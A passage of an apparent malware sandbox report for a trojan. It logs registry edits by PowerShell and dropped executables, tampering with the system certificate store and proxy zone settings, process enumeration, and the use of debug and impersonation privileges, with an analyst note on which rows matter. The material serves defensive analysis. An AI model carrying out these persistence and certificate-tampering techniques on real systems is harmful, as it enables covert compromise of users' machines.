Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac3
4405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f8216
19b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious use of AdjustPrivilegeToken

Note: the long run of WMIC.exe rows (SeIncreaseQuotaPrivilege through LUID 36, listed twice) is the privilege set wmic.exe enables on its own token at startup; it shows up for any WMIC use and is not by itself evidence of the malware requesting those rights. The rows worth attention are SeDebugPrivilege on the dropper, on regasm.exe and on the two Pictures\*.exe payloads, SeImpersonatePrivilege on those payloads, SeSystemEnvironmentPrivilege (firmware variable access) on C:\Windows\rss\csrss.exe, and SeSecurityPrivilege on sc.exe, which is required to write the SACL in the sc sdset command further down.

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
